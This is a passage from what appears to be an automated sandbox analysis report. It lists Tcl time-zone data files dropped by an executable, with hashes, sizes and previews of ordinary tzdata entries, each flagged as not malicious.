                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:t7K22m2eQ7SRWu3O559BxXWDpws1dwVyUAitGeZiSI0PMnp4ozDCM9LfLPix3QWZ:t7K22m2eQ7Swu3O559BxXWDpws1dwVyU
                                                                                                                                                                                                                                                    MD5:F6B8A2DA74DC3429EC1FAF7A38CB0361
                                                                                                                                                                                                                                                    SHA1:1651AD179DB98C9755CDF17FBFC29EF35DE7F588
                                                                                                                                                                                                                                                    SHA-256:FEAA62063316C8F4AD5FABBF5F2A7DD21812B6658FEC40893657E909DE605317
                                                                                                                                                                                                                                                    SHA-512:46C61EFF429075A77C01AF1C02FD6136529237B30B7F06795BCEE26CDB75DDAB2D418283CD95C9A0140D1510E02F393F0A7E9414C99D1B31301AE213BAF50681
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Winnipeg) {. {-9223372036854775808 -23316 0 LMT}. {-2602258284 -21600 0 CST}. {-1694368800 -18000 1 CDT}. {-1681671600 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1029686400 -18000 1 CDT}. {-1018198800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-746035200 -18000 1 CDT}. {-732733200 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620755200 -18000 1 CDT}. {-607626000 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Yakutat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8407
                                                                                                                                                                                                                                                    Entropy (8bit):3.877915398499678
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ZgOZVKyjVYus/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:ZBZVKH/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:8F3203A395A098A1559DBA8211E507BB
                                                                                                                                                                                                                                                    SHA1:24295E907BB779FB6E606730C0EA804D4FD06609
                                                                                                                                                                                                                                                    SHA-256:2B54CD306F1B99938A1D0926020A569D1D1588A340059DEC1DE61FBFD2A1076C
                                                                                                                                                                                                                                                    SHA-512:CE66B5CCEA8AD706854A03C7FBE3E5EC680FED1F716563566E8357083CCFC4E55795609139E999DAF4F5CD4D88269947FDD1D2E10F68E5DE46D02E67FA5A0046
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yakutat) {. {-9223372036854775808 52865 0 LMT}. {-3225364865 -33535 0 LMT}. {-2188953665 -32400 0 YST}. {-883580400 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-757350000 -32400 0 YST}. {-31503600 -32400 0 YST}. {-21474000 -28800 1 YDT}. {-5752800 -32400 0 YST}. {9975600 -28800 1 YDT}. {25696800 -32400 0 YST}. {41425200 -28800 1 YDT}. {57751200 -32400 0 YST}. {73479600 -28800 1 YDT}. {89200800 -32400 0 YST}. {104929200 -28800 1 YDT}. {120650400 -32400 0 YST}. {126702000 -28800 1 YDT}. {152100000 -32400 0 YST}. {162385200 -28800 1 YDT}. {183549600 -32400 0 YST}. {199278000 -28800 1 YDT}. {215604000 -32400 0 YST}. {230727600 -28800 1 YDT}. {247053600 -32400 0 YST}. {262782000 -28800 1 YDT}. {278503200 -32400 0 YST}. {294231600 -28800 1 YDT}. {309952800 -32400 0 YST}. {325681200

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Yellowknife

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7485
                                                                                                                                                                                                                                                    Entropy (8bit):3.785447517514148
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:qGzGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:YVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                    MD5:F7892A95AC025FF42DEAC7DD68E9A1D6
                                                                                                                                                                                                                                                    SHA1:5FDFEB833006620505CE2F0F47C7E0B34319DB3C
                                                                                                                                                                                                                                                    SHA-256:E682009C097E6902595CD860F284E5354DCDD90BE68A19431A40F839B50C42A8
                                                                                                                                                                                                                                                    SHA-512:E186DC91EF45C3DAAA3529C75570D9402EDB529045F1ECB7EA99E74F465E107B63ACABA024CE25DB56387562948BE55DF09FB726D511AB59B81ED646331EF3BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yellowknife) {. {-9223372036854775808 0 0 zzz}. {-1104537600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {68

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Casey

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):263
                                                                                                                                                                                                                                                    Entropy (8bit):4.6496354102259465
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52L09xvFJm2OHaTQMFH9DTKNH6ATVs:MBp52Lc9mdHaTQMFH93Kx5TVs
                                                                                                                                                                                                                                                    MD5:31C10B733636008D3C4A4A5C7ED37021
                                                                                                                                                                                                                                                    SHA1:74DDEE2693FEB092BA39538057D11D926845A07B
                                                                                                                                                                                                                                                    SHA-256:DE836A1D45233991C82D9DC3BA52F14BA83804E5947C970488D8F54E2DE30354
                                                                                                                                                                                                                                                    SHA-512:C8C4B631C2CE8AD8742EE9CE5991C2E48DF3F4A2DEA4DF9DEBACA72F1498FB86641650F03DE5988636D4C194C34269F72A1D4DEC8FB6DC605D695D24711B657E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Casey) {. {-9223372036854775808 0 0 zzz}. {-31536000 28800 0 AWST}. {1255802400 39600 0 CAST}. {1267714800 28800 0 AWST}. {1319738400 39600 0 CAST}. {1329843600 28800 0 AWST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Davis

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):318
                                                                                                                                                                                                                                                    Entropy (8bit):4.486342929628561
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52L0DTm2OHaRwz0/ePX7VoX/eyfyRXhNXSeOC/ed:MBp52LeTmdHaKxXODaRRF+
                                                                                                                                                                                                                                                    MD5:BA37E2A48529496C9EBA7E416591C644
                                                                                                                                                                                                                                                    SHA1:AD1C15A0E84C10EBDE9F0404DF969B2EE14CB18E
                                                                                                                                                                                                                                                    SHA-256:B17ABA536140CE822CD14845BD92E85FA1D36CD3AE36F993B99535EA95BACF96
                                                                                                                                                                                                                                                    SHA-512:B96A5324F1D0F25F5518737C8C3B942B9D1A0E626CDC6463F973928AEB0A53EB2C7A65E90C3305E9898220AB582CE3C89943A46605EADC4E4A99309D64B73071
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Davis) {. {-9223372036854775808 0 0 zzz}. {-409190400 25200 0 DAVT}. {-163062000 0 0 zzz}. {-28857600 25200 0 DAVT}. {1255806000 18000 0 DAVT}. {1268251200 25200 0 DAVT}. {1319742000 18000 0 DAVT}. {1329854400 25200 0 DAVT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\DumontDUrville

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):207
                                                                                                                                                                                                                                                    Entropy (8bit):4.841687980121893
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52L0/3Om2OHajRX8azcJRJ6SXeKn:MBp52LdmdHajx8azkkK
                                                                                                                                                                                                                                                    MD5:E4CD713CC96B408C1AF1128EE19C2683
                                                                                                                                                                                                                                                    SHA1:E431DF0AF88DDAEB69B563BD2B75CCAC859DC66E
                                                                                                                                                                                                                                                    SHA-256:415711270E2FB8F3DE8ABEF98E51810445520D6FFA9A384AC9C0973324CE9DA6
                                                                                                                                                                                                                                                    SHA-512:420D8F397CB8B9BED0DCFA69B68FEF7A0B66AE6169FB3D40C9360EA2A86C6210225880E2CD000C468AF5B52B19A2B74E0E1D7ABB0AB6F05F9B2AE9D9C020DEC0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/DumontDUrville) {. {-9223372036854775808 0 0 zzz}. {-725846400 36000 0 PMT}. {-566992800 0 0 zzz}. {-415497600 36000 0 DDUT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Macquarie

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2801
                                                                                                                                                                                                                                                    Entropy (8bit):3.8789590757349917
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQbTeUk467hLiVVitCinq+D18KmvLx0WWuyymPXObf78FCt7WQi2Njw:5dqlKiG+h5mjKIyym+WQNk
                                                                                                                                                                                                                                                    MD5:D9ABBC08D989AD15D15DCCE055F12330
                                                                                                                                                                                                                                                    SHA1:A1D5462AB53564F219C8841CAF2870AE193083CC
                                                                                                                                                                                                                                                    SHA-256:06E4E78D8AD4EF8EE86D3FA2A3EDA16BA2272EF9A043B3AA626E5DF88B400C42
                                                                                                                                                                                                                                                    SHA-512:75C864E70ADB7BFAB062D311A91913AC16C464641552D44E1540C90904F3B7104881702DEA87B09BD6C4C36FB59FB61CC517BA5F7F4342A1170948484B6B83E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Macquarie) {. {-9223372036854775808 0 0 zzz}. {-2214259200 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-1601719200 0 0 zzz}. {-94730400 36000 0 AEST}. {-71136000 39600 1 AEDT}. {-55411200 36000 0 AEST}. {-37267200 39600 1 AEDT}. {-25776000 36000 0 AEST}. {-5817600 39600 1 AEDT}. {5673600 36000 0 AEST}. {25632000 39600 1 AEDT}. {37728000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Mawson

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.828936781959796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52L0GRHEzyedFkXGm2OHv/fCF/mVU/VPKVVFUysvUXS7tvn:SlSWB9X52L0zyEm2OHary/3sZBn
                                                                                                                                                                                                                                                    MD5:78B2CE32973FB9701B7FE487B082941A
                                                                                                                                                                                                                                                    SHA1:1A056555E64B2C7F7926B6A7F043049A2E93150D
                                                                                                                                                                                                                                                    SHA-256:29472C5FAE7149AE3BC007D0BE4D1B1975E46F3BB77434832467C1326DF90AE2
                                                                                                                                                                                                                                                    SHA-512:FD7DF0F9913A0E77F9F53F954A9EA16D616334DED7BAA41B1D54990C6458FFFB70CF2D5204288AD430833FFA36E22247144C4E624AEC1FF215EA79D92232869E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Mawson) {. {-9223372036854775808 0 0 zzz}. {-501206400 21600 0 MAWT}. {1255809600 18000 0 MAWT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\McMurdo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.832254042797831
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG/u4pVAIgObT/NCxL2L0GRHEz6BVfnUDH/uvn:SlSWB9IZaM3ycqIVAIgOboL2L0z6/fvn
                                                                                                                                                                                                                                                    MD5:0048A7427AC7880B9F6413208B216BC9
                                                                                                                                                                                                                                                    SHA1:CBB4A29316581CFC7868A779E97DB94F75870F41
                                                                                                                                                                                                                                                    SHA-256:487D4845885643700B4FF043AC5EA59E2355FD38357809BE12679ECAFFA93030
                                                                                                                                                                                                                                                    SHA-512:EC107FA59203B7BCB58253E2715380EF70DF5470030B83E1DEA8D1AC4E7D3FB2908E8C7009D8136212871EC3DA8B4C4194FF3290E5A41EEE8E7D07CABE80ECC0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Palmer

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2504
                                                                                                                                                                                                                                                    Entropy (8bit):3.9021405085103424
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:59qSkuSkGwRSkzGSkHdUJmSnS9SdSsSp3lSPS7S/STyzSNXSWS8SvSmSSSASYSxe:a+PRjG3dUJmugM981i+SLWXzx6z31hoe
                                                                                                                                                                                                                                                    MD5:2E41B55D9A695B7139A028228903D0C8
                                                                                                                                                                                                                                                    SHA1:494A2A4074E275B07494405326E14D0698208A44
                                                                                                                                                                                                                                                    SHA-256:E8B3546141F27400245694F6B603078870E94176F0727BC086751CC51A38E277
                                                                                                                                                                                                                                                    SHA-512:F63E40731A869A5D303AA90578D682E4B38E6490191D7C5C7927D3A31E2FF239636150B293E0E73181A2B2AD3D37BF08670E5129CA695D57CD57660E4E56F5E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Palmer) {. {-9223372036854775808 0 0 zzz}. {-157766400 -14400 0 ART}. {-152654400 -14400 0 ART}. {-132955200 -10800 1 ARST}. {-121122000 -14400 0 ART}. {-101419200 -10800 1 ARST}. {-86821200 -14400 0 ART}. {-71092800 -10800 1 ARST}. {-54766800 -14400 0 ART}. {-39038400 -10800 1 ARST}. {-23317200 -14400 0 ART}. {-7588800 -10800 0 ART}. {128142000 -7200 1 ARST}. {136605600 -10800 0 ART}. {389070000 -14400 0 CLT}. {403070400 -10800 1 CLST}. {416372400 -14400 0 CLT}. {434520000 -10800 1 CLST}. {447822000 -14400 0 CLT}. {466574400 -10800 1 CLST}. {479271600 -14400 0 CLT}. {498024000 -10800 1 CLST}. {510721200 -14400 0 CLT}. {529473600 -10800 1 CLST}. {545194800 -14400 0 CLT}. {560923200 -10800 1 CLST}. {574225200 -14400 0 CLT}. {592372800 -10800 1 CLST}. {605674800 -14400 0 CLT}. {624427200 -10800 1 CLST}. {637124400 -14400 0 CLT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Rothera

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):146
                                                                                                                                                                                                                                                    Entropy (8bit):4.897451485949667
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52L0GRHEsKRaXGm2OHv/fCF/F/H3VVFVtC:SlSWB9X52L0rRhm2OHa//VVF7C
                                                                                                                                                                                                                                                    MD5:D0D77DD1FC371697C5C41A84CCA4C362
                                                                                                                                                                                                                                                    SHA1:1EE9D25A49B17B384F459E48E48626ED2529FDAA
                                                                                                                                                                                                                                                    SHA-256:099ECC8A06D74A92758F619AED115F42F490D0AC515568D7308DDD29AE148503
                                                                                                                                                                                                                                                    SHA-512:0BDFDA36EC0F16511CDBDA2A938944081ECA746755175C12C09F6CCCA83F449A922DAF18268E17BA3D3DE8319C21152A39EB26AB6CA855F0C18A9263086BE0ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Rothera) {. {-9223372036854775808 0 0 zzz}. {218246400 -10800 0 ROTT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\South_Pole

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.858829912809126
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3ycqIVAIgOboL2L0tlo+plvn:MBaIMdQiO2LMq+p1
                                                                                                                                                                                                                                                    MD5:51AC23110E7EAB20319EE8EC82F048D2
                                                                                                                                                                                                                                                    SHA1:7B4DE168A3078041841762F468AE65A2EE6C5322
                                                                                                                                                                                                                                                    SHA-256:D33E094979B3CE495BEF7109D78F7B77D470AB848E4E2951851A7C57140354BF
                                                                                                                                                                                                                                                    SHA-512:13E800DFFA3D65F94FAD6B529FC8A29A26F40F4F29DBF19283392733458AD3C6B27E479218A8C123424E965711B4746976E39EB9FD54CD0B57281134FEAC4F31
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Syowa

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                    Entropy (8bit):4.870240083017443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52L0GRHEtWlFeEXGm2OHv/fCF/noMdMbv:SlSWB9X52L0tQeLm2OHaRbK
                                                                                                                                                                                                                                                    MD5:ECA41775A0B086F9793055251447D1A8
                                                                                                                                                                                                                                                    SHA1:7D760E1811F5893122659434E2B2DA0128210D6E
                                                                                                                                                                                                                                                    SHA-256:6372A7C104A8C5A49F223F78909201A8BEB6A4A494D56FE3EE075481E6F4A3A8
                                                                                                                                                                                                                                                    SHA-512:48428C664D224AA6D140EE085C889821F7A4558BA55E6563EC22DCBE4BB96DAEA3ECFFDA607211EFC763FB17B940C91679698049D57E980ABCC0201E442AFCB0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Syowa) {. {-9223372036854775808 0 0 zzz}. {-407808000 10800 0 SYOT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Troll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5269
                                                                                                                                                                                                                                                    Entropy (8bit):3.772419187902428
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:lp8rId3zbGwC0mFQRSH/fM0fb4tfrJpBeQoUccrfp5KAMC3gfd+L1rLl2L52ehYo:aHXMq8BrPRU6ZBxZTocRM
                                                                                                                                                                                                                                                    MD5:1E0562BC1C2F6F564EA294E48A114937
                                                                                                                                                                                                                                                    SHA1:C14DEEA65E094F80A47A3CD56C6A48A62ECED42F
                                                                                                                                                                                                                                                    SHA-256:4B867C6680E4B1A72B7242635493EC9A48E15610F9C85C7AF2DAFC09978C119F
                                                                                                                                                                                                                                                    SHA-512:DA86FBC00306B025C1E09C4989274C0DBC3B494B7DC9A857470BBC40E2403B8B5AE2B5A5628DC35EE5A2AA14A8C4F2AB84441672D05478D760A3605FFDDFD2F6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Troll) {. {-9223372036854775808 0 0 zzz}. {1108166400 0 0 UTC}. {1111885200 7200 1 CEST}. {1130634000 0 0 UTC}. {1143334800 7200 1 CEST}. {1162083600 0 0 UTC}. {1174784400 7200 1 CEST}. {1193533200 0 0 UTC}. {1206838800 7200 1 CEST}. {1224982800 0 0 UTC}. {1238288400 7200 1 CEST}. {1256432400 0 0 UTC}. {1269738000 7200 1 CEST}. {1288486800 0 0 UTC}. {1301187600 7200 1 CEST}. {1319936400 0 0 UTC}. {1332637200 7200 1 CEST}. {1351386000 0 0 UTC}. {1364691600 7200 1 CEST}. {1382835600 0 0 UTC}. {1396141200 7200 1 CEST}. {1414285200 0 0 UTC}. {1427590800 7200 1 CEST}. {1445734800 0 0 UTC}. {1459040400 7200 1 CEST}. {1477789200 0 0 UTC}. {1490490000 7200 1 CEST}. {1509238800 0 0 UTC}. {1521939600 7200 1 CEST}. {1540688400 0 0 UTC}. {1553994000 7200 1 CEST}. {1572138000 0 0 UTC}. {1585443600 7200 1 CEST}. {1603587600 0 0 UTC}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Antarctica\Vostok

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):145
                                                                                                                                                                                                                                                    Entropy (8bit):4.889998800024563
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52L0GRHEoKcMFtXGm2OHv/fCF/gd/bVFXKVVFJtvn:SlSWB9X52L0XcMFEm2OHaqVFXK/Nn
                                                                                                                                                                                                                                                    MD5:A75528ECB73AA4F1A40182E54C69246C
                                                                                                                                                                                                                                                    SHA1:390AE655C44523ABBC4D84925E84795F2822FA6B
                                                                                                                                                                                                                                                    SHA-256:53C302E681EDFCBE0A0B757DEC7A1E0CA584E2D8A5EE3D4BFDBEBE4C71AEE02A
                                                                                                                                                                                                                                                    SHA-512:7ABEBEDE35059F6AB73DB952475D94E7D76AC1A433C6E3568262AD84ABF92B24B3E3D5FE373709D35079E74379BBC77B8C19D2DF7CC852239294717FFAE758C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Vostok) {. {-9223372036854775808 0 0 zzz}. {-380073600 21600 0 VOST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Arctic\Longyearbyen

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.922114908130109
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVyWJooedVAIgoqxWJ0YF2XbeLo4cA4FH/h8QasWJ/n:SlSWB9IZaM3ymSDdVAIgo2Q2XbUyAK8H
                                                                                                                                                                                                                                                    MD5:0F69284483D337DC8202970461A28386
                                                                                                                                                                                                                                                    SHA1:0D4592B8EBE070119CB3308534FE9A07A758F309
